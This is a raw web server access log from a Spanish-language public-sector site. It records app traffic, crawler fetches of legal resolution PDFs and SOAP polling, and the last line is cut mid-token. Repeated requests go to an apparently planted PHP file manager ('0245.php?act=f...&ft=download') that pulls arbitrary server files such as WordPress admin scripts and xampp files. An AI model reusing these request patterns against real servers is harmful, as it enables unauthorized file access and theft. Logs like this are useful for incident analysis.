186.29.33.66 - - [29/Jun/2024:10:05:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:05:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:05:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:05:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:05:50 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3840
186.29.33.66 - - [29/Jun/2024:10:05:51 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3836
186.29.33.66 - - [29/Jun/2024:10:05:55 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 17877
201.245.192.253 - - [29/Jun/2024:10:05:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.29.33.66 - - [29/Jun/2024:10:05:56 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 119279
186.29.33.66 - - [29/Jun/2024:10:05:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:05:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:05:57 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:05:57 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:10:05:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.29.33.66 - - [29/Jun/2024:10:06:02 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/meta/meta.xhtml HTTP/1.1" 200 200854
186.29.33.66 - - [29/Jun/2024:10:06:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:03 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.59.48 - - [29/Jun/2024:10:06:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=NuestraGente_MarchaPaz.flv&ft=download&white=1 HTTP/1.1" 200 1851027
186.29.33.66 - - [29/Jun/2024:10:06:06 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/actividad/crearActividad.xhtml HTTP/1.1" 200 119279
186.29.33.66 - - [29/Jun/2024:10:06:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:07 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:10 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/meta/meta.xhtml HTTP/1.1" 200 26953
186.29.33.66 - - [29/Jun/2024:10:06:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:11 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:11 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:15 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/actividad/ponderacionVertical.xhtml HTTP/1.1" 200 5626
186.29.33.66 - - [29/Jun/2024:10:06:19 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/actividad/ponderacionVertical.xhtml HTTP/1.1" 200 5578
186.29.33.66 - - [29/Jun/2024:10:06:21 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/actividad/ponderacionVertical.xhtml HTTP/1.1" 200 150675
186.29.33.66 - - [29/Jun/2024:10:06:21 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:21 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:21 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:21 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:21 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:21 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:21 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:21 -0500] "GET /sipse/faces/javax.faces.resource/spacer/dot_clear.gif?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:21 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:21 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.17.25 - - [29/Jun/2024:10:06:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=3085.pdf&ft=download HTTP/1.1" 200 97959
186.29.33.66 - - [29/Jun/2024:10:06:26 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:26 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/meta/meta.xhtml HTTP/1.1" 200 201108
186.29.33.66 - - [29/Jun/2024:10:06:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:29 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/actividad/crearActividad.xhtml HTTP/1.1" 200 2588
186.29.33.66 - - [29/Jun/2024:10:06:31 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/actividad/crearActividad.xhtml HTTP/1.1" 200 2979
66.249.66.12 - - [29/Jun/2024:10:06:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4883.pdf HTTP/1.1" 200 457773
186.29.33.66 - - [29/Jun/2024:10:06:36 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/actividad/crearActividad.xhtml HTTP/1.1" 200 144890
186.29.33.66 - - [29/Jun/2024:10:06:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:06:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.17.252 - - [29/Jun/2024:10:06:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=1553.pdf&ft=download HTTP/1.1" 200 675495
216.245.221.92 - - [29/Jun/2024:10:06:50 -0500] "HEAD / HTTP/1.1" 200 -
47.128.19.218 - - [29/Jun/2024:10:06:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=3138.pdf&ft=download HTTP/1.1" 200 364199
201.245.192.253 - - [29/Jun/2024:10:06:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.45.173 - - [29/Jun/2024:10:07:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=4777.pdf&ft=download HTTP/1.1" 200 343719
47.128.40.144 - - [29/Jun/2024:10:07:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=5523.pdf&ft=download HTTP/1.1" 200 20134
66.249.66.12 - - [29/Jun/2024:10:07:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2428.pdf HTTP/1.1" 200 463970
47.128.37.198 - - [29/Jun/2024:10:07:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=post.php&ft=download HTTP/1.1" 200 8883
201.245.192.253 - - [29/Jun/2024:10:07:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:10:07:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
45.156.128.45 - - [29/Jun/2024:10:07:59 -0500] "GET / HTTP/1.1" 200 319
66.249.66.12 - - [29/Jun/2024:10:08:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2722.pdf HTTP/1.1" 200 406243
66.249.66.11 - - [29/Jun/2024:10:08:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5213.pdf HTTP/1.1" 200 295247
47.128.40.215 - - [29/Jun/2024:10:08:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=6387.pdf&ft=download HTTP/1.1" 200 384679
47.128.40.199 - - [29/Jun/2024:10:08:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=feed-rdf.php&ft=download HTTP/1.1" 200 2640
66.249.66.12 - - [29/Jun/2024:10:08:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3445.pdf HTTP/1.1" 200 478502
47.128.40.221 - - [29/Jun/2024:10:08:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2024&f=00447.pdf&ft=download HTTP/1.1" 200 503462
47.128.58.110 - - [29/Jun/2024:10:08:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Chuelladecarbono&f=._cambio_climatico_0clip_image002.png&ft=download HTTP/1.1" 200 4096
201.245.192.253 - - [29/Jun/2024:10:08:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.25.108 - - [29/Jun/2024:10:09:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2635.pdf&ft=download HTTP/1.1" 200 364199
186.154.46.227 - - [29/Jun/2024:10:09:20 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 513755
66.249.66.11 - - [29/Jun/2024:10:09:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2931.pdf HTTP/1.1" 200 409091
47.128.37.183 - - [29/Jun/2024:10:09:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp&f=cds.php&ft=download HTTP/1.1" 200 5138
186.154.46.227 - - [29/Jun/2024:10:09:31 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 14105
186.154.46.227 - - [29/Jun/2024:10:09:34 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
186.154.46.227 - - [29/Jun/2024:10:09:33 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 399696
66.249.66.11 - - [29/Jun/2024:10:09:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0179.pdf HTTP/1.1" 200 329215
172.22.2.4 - - [29/Jun/2024:10:08:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.57.68 - - [29/Jun/2024:10:09:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5C&f=options.php&ft=download&white=1 HTTP/1.1" 200 10866
66.249.66.11 - - [29/Jun/2024:10:09:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20351-400/00000366.tif HTTP/1.1" 200 61120
66.249.66.11 - - [29/Jun/2024:10:09:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/0416.pdf HTTP/1.1" 200 412829
201.245.192.253 - - [29/Jun/2024:10:09:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:10:09:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:10:10:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1469.pdf HTTP/1.1" 200 365632
201.245.192.253 - - [29/Jun/2024:10:10:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.57.50 - - [29/Jun/2024:10:10:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1151-1200&f=00001173.tif&ft=download HTTP/1.1" 200 154028
66.249.66.12 - - [29/Jun/2024:10:10:07 -0500] "GET /resoluciones/RESOLUCIONES%202008/1187.pdf HTTP/1.1" 404 1018
172.22.2.4 - - [29/Jun/2024:10:08:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57136
66.249.66.12 - - [29/Jun/2024:10:10:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0622.pdf HTTP/1.1" 200 353416
201.245.192.253 - - [29/Jun/2024:10:10:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:10:11:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2792.pdf HTTP/1.1" 200 404540
66.249.66.12 - - [29/Jun/2024:10:11:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2793.pdf HTTP/1.1" 200 354864
66.249.66.11 - - [29/Jun/2024:10:11:04 -0500] "GET /BLA/resoluciones/AUTOS%202024/02454.pdf HTTP/1.1" 304 -
66.249.66.12 - - [29/Jun/2024:10:11:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4519.pdf HTTP/1.1" 200 941131
216.245.221.92 - - [29/Jun/2024:10:11:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:10:11:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:10:11:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:10:11:58 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20C-595-2010.doc HTTP/1.1" 304 -
66.249.66.13 - - [29/Jun/2024:10:12:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0484.pdf HTTP/1.1" 200 349706
201.245.192.253 - - [29/Jun/2024:10:12:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:10:13:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20601-650/00000620.tif HTTP/1.1" 200 47844
66.249.66.11 - - [29/Jun/2024:10:13:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4151.pdf HTTP/1.1" 200 676798
201.245.192.253 - - [29/Jun/2024:10:13:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:10:13:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:10:14:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4018.pdf HTTP/1.1" 200 346478
66.249.66.11 - - [29/Jun/2024:10:14:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4438.pdf HTTP/1.1" 200 399471
185.224.128.43 - - [29/Jun/2024:10:14:30 -0500] "GET / HTTP/1.1" 200 319
66.249.66.12 - - [29/Jun/2024:10:14:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3416.pdf HTTP/1.1" 304 -
66.249.66.13 - - [29/Jun/2024:10:14:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0662.pdf HTTP/1.1" 200 508551
201.245.192.253 - - [29/Jun/2024:10:14:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:10:15:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [29/Jun/2024:10:13:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.11 - - [29/Jun/2024:10:15:37 -0500] "GET /Publicaciones/2024EE64667.pdf HTTP/1.1" 404 227
66.249.66.13 - - [29/Jun/2024:10:15:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0482.pdf HTTP/1.1" 304 -
66.249.66.12 - - [29/Jun/2024:10:15:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4041.pdf HTTP/1.1" 304 -
66.249.66.13 - - [29/Jun/2024:10:15:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1070.pdf HTTP/1.1" 304 -
66.249.66.13 - - [29/Jun/2024:10:15:38 -0500] "GET /BLA/resoluciones/AUTOS%202023/03681.pdf HTTP/1.1" 304 -
66.249.66.12 - - [29/Jun/2024:10:15:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2960.pdf HTTP/1.1" 200 481366
66.249.66.11 - - [29/Jun/2024:10:15:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5070.pdf HTTP/1.1" 200 486723
201.245.192.253 - - [29/Jun/2024:10:15:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:10:15:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:10:16:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5014.pdf HTTP/1.1" 200 412854
66.249.66.11 - - [29/Jun/2024:10:16:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3358.pdf HTTP/1.1" 200 341699
40.77.167.1 - - [29/Jun/2024:10:16:18 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 447527
172.22.2.4 - - [29/Jun/2024:10:14:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
66.249.66.13 - - [29/Jun/2024:10:16:32 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/xxxxx%20incendios/sitio/xtras/2.pdf HTTP/1.1" 404 1018
66.249.66.11 - - [29/Jun/2024:10:16:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3578.pdf HTTP/1.1" 200 412030
216.245.221.92 - - [29/Jun/2024:10:16:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:10:16:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:10:17:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34949
201.245.192.253 - - [29/Jun/2024:10:17:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35139
40.77.167.1 - - [29/Jun/2024:10:17:18 -0500] "GET /siipev/ HTTP/1.1" 200 493
216.244.66.195 - - [29/Jun/2024:10:17:21 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.66.12 - - [29/Jun/2024:10:17:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4660.pdf HTTP/1.1" 200 478329
66.249.66.11 - - [29/Jun/2024:10:17:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4328.pdf HTTP/1.1" 200 386549
79.110.72.187 - - [29/Jun/2024:10:17:49 -0500] "GET /BLA/resoluciones/AUTOS%202023/2274.pdf HTTP/1.1" 200 747654
201.245.192.253 - - [29/Jun/2024:10:17:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:10:17:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.1 - - [29/Jun/2024:10:18:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/2766.pdf HTTP/1.1" 304 -
172.202.243.114 - - [29/Jun/2024:10:18:05 -0500] "GET / HTTP/1.1" 200 319
186.102.99.234 - - [29/Jun/2024:10:18:11 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18dwn1AWnFG616jLNJVUFhAaRIaYb1a33HsDjGAbVcMc6QvnRWxLBaj&y=U2FsdGVkX18DrA4I7caxljZuXGc2c5J3HK/FYfDAP0QgKDTSuIy4BclQtuUncbmI HTTP/1.1" 200 30
186.102.99.234 - - [29/Jun/2024:10:18:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/jZqe0jWPoSTyQ765yizRP1OOUkYaahI5FGZEUZtYJ7CE/ghFjB5RD8ejzzjTfvtxvbSvnbeg0aZIoQ6aVT8H5r1DgLhrKBqU=&u=U2FsdGVkX1+VWNSRE1D1z3wGKcwnCmo6oggCer9OwsmGJseTWvlmF1qbaLl6XYqy&y=U2FsdGVkX18DrA4I7caxljZuXGc2c5J3HK/FYfDAP0QgKDTSuIy4BclQtuUncbmI HTTP/1.1" 200 97
186.102.99.234 - - [29/Jun/2024:10:18:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19dKPpkSMViBBPUCUlWs7wgRQGm2sy1ulApM+lDPSCYrA8mYAZyrMyx4CL/o9q+B3RmRnN5TPz/NTG+5oUDqzeVQo8g8sUbgNsNmks9gdYZ0QDd2KUOjG70NaqyG0ACpi+QHWTBIf5oYWJWp7UNZemKPhEjGA9Id4e3jaIUQ3jOjIJoYMNnd5JtNhVpgVwhpefgDv0nBqGhGM21EXeQKuKHivaPetVbn28vDdQWm/tkKQzTmhHk+JJun/F7oB0H8gwO5nfHXZyYRrLWrAaEvONufPLoLK9rROhA2kC5fFQiu+pQBp1cZbTtAodbmDHxpq5cKZDcR84bCOOPZV+QErrHUPqwaqTpZgLxbejVu1kD6CPJh7pS7xsthD9UaR6M9NUMyxWknLx6H+Y/jzkFo2bCfvRxUQI8l7JM4gENMHL1CYcLbzTdTM4jVg5XQ5v0cggMWDaIFmHzK5amohMcbDPV2fiH43o5kOfgpz4FGFg7QrgUtYtEthsDWfTprbYFTZUZrA6g6Eug7SkoPefjXqi8a+7Fc3bMZTJYU+guWz+n2CDsk8cPw2c+vZzFzgtadupdiv8sjboSf8xPueJud3aCDCdI77Gv+GNy5W1gKR1zDW8MH2YE+ZtDgBpZ5UxxmAc7DYEOEjfZOCl/OEbq0vLoc0ryda6bfPMgIUHBG//r0eyEGhcJdrhIi6RD7VWrB4Km9Ohfn6ZnWKrJW93tc/uNbS8cQBW1tJSsi6yuqgL+xgr9cZuIjguzgKJIsgmaIv9nrUeDcwa8N3nZl2VQuIxWKQXD/VfNq9OrRG5oXkYbcmJvppkDu1HyiUfUvqalr91BloP9ZksSQum7Sb/H5ZVgIcLcWHSFjRj8L8/e0HSlJCY1QOMNNoUd4MsCh9vOmMj9NrgTxkXVZ9YD3+Ucv7/11M9OFnHw7rWC9EwB675IJeeXiyL4P1GcYyTsX+bBanVN4S7pD0P0h29yK6hEi+joI8CsegT5Yn+bCY6l0hJneRJ9xms3QZwggX9X5NpJkxt78kmSdeugmUGZmEGJ7ZwxuT+KpMvmvAfFDk2W19BrI8lYfLnmeXV7dv64rOGpixa+4MJS6r5hOXRQYDH8YnHB4bFU8i1JXz7fQmgny7np6KLLT8zCX0iC/m4nbYVhXOMUQ7/jXmEg8aYicEUeLKAXUR4YYrCYyQAVhd8fGGq+T3Ci7Ank9+FlPuIbbfCG20+cFODw7IiahbUS4kNPnvFpxXbZIbMhOyDOD+KbJcSSPzdLzpa6v8iXMeH9PQBYG5+rHabNpnzQB37sDlO2bx4uEH1CCFjIakWQNSH0IL+d8LkWYpgbsJAgZJYH9tZ6OCvVmbGr9DvN97tozBZVpuAshF8S4d+M6QEhUJUDxzZfD0Jkzy3YpxrMQJarLzS7LDfkHddnwAdKifq5OyYTXwSuUvpxUZBtBjf3O+A16UaHtwZFHE/ev40k38nHQcNyXQ+0tgWHwLJsK5Q9pPOdi8Dwyvm10Wwqtu8gxexcCrmb9jFuirW5IbNq+1ep+rDRR2mKU4GBLt3QIi/IGUe4eptIuGvS+PzZJBTuaOoW/2NsfejkFESbMi6JapS4cpgoRcNhGTNRO3/85ec/p+0eMCsVIAm4La9Se3wGb0WfaUcunP/gaVl